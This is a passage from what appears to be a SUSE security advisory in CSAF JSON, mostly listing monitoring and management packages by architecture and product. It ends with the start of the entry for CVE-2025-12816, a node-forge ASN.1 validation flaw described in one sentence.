"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64"
},
"product_reference": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le"
},
"product_reference": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x"
},
"product_reference": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64"
},
"product_reference": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-11.6.11-150000.1.90.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64"
},
"product_reference": "grafana-11.6.11-150000.1.90.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-11.6.11-150000.1.90.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le"
},
"product_reference": "grafana-11.6.11-150000.1.90.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-11.6.11-150000.1.90.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x"
},
"product_reference": "grafana-11.6.11-150000.1.90.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-11.6.11-150000.1.90.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64"
},
"product_reference": "grafana-11.6.11-150000.1.90.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch"
},
"product_reference": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-lang-0.1.38-150000.1.30.1.noarch as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch"
},
"product_reference": "mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch"
},
"product_reference": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacecmd-5.0.15-150000.3.142.1.noarch as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch"
},
"product_reference": "spacecmd-5.0.15-150000.3.142.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dracut-saltboot-1.1.0-150000.1.65.1.noarch as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch"
},
"product_reference": "dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64 as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64 as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.aarch64 as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.s390x as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.x86_64 as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch"
},
"product_reference": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-lang-0.1.38-150000.1.30.1.noarch as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch"
},
"product_reference": "mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch"
},
"product_reference": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64 as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64 as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64 as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64 as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dracut-saltboot-1.1.0-150000.1.65.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch"
},
"product_reference": "dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacecmd-5.0.15-150000.3.142.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
},
"product_reference": "spacecmd-5.0.15-150000.3.142.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-12816",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-12816"
}
],
"notes": [
{
"category": "general",
"text": "An interpretation-conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and earlier enables unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
